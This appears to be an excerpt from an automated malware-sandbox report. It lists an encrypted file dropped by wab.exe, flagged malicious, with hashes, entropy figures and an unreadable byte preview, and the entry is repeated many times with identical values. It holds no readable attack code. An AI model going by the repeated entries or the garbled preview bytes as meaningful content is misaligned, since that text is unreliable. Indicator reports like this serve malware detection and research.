                                                                                          SSDEEP:3072:L0mAjS+P7Jzk7IbNlP/a/+QrQQ6C+p6b9dbEP9RFaHPe3ISqKhtZbcP04c0w7m/m:ohjS+P9k8NlPC/yQ/m6xdbERFemBqMpn
                                                                                          MD5:0E8127DA683715DBD907BCD0880C8BA6
                                                                                          SHA1:F590C26A21413B1333D0F32BEA6328D903B3159D
                                                                                          SHA-256:AEFDCB41ADA8BF8D6BF2901E2983C401927642006654FD0A32DD9C0F4C510782
                                                                                          SHA-512:8904510D562C1A9DC45999C7A9F69F5A5305F7A0D6B6F2382824727A0397B1701AAF28DC0BDFED2842B6F37D8F1449E7F7DE67EACE6B57801206A8DAB2242202
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
                                                                                          Entropy (8bit):7.998960906247979
                                                                                          Encrypted:true
                                                                                          SSDEEP:3072:LMzyRjxdnHw9nUF2KtshO14yuyisxHtpSNGS0MrLId39fas6hDt8eEIiSR2A7bxf:YzytbGOX6A16mtpmGvFdVT6LELSRDq+
                                                                                          MD5:FF1141E128FE872B351E39F011E0FB51
                                                                                          SHA1:A9474C6634DF82E53D2EE09726DF7C0222137D33
                                                                                          SHA-256:3269CDD8F5710ECB35EA7FD1A5938393C66751262147E4A8F6A5728783821349
                                                                                          SHA-512:03EC6342C88519BAD398EE3E219B9064CE87278633A0C7BA0FB3FF44584C1502A756FC378CE2E077D95914172613166F57D7A7833A38B31771A575DA70878E97
                                                                                          Malicious:true
                                                                                          Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                          Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):185341
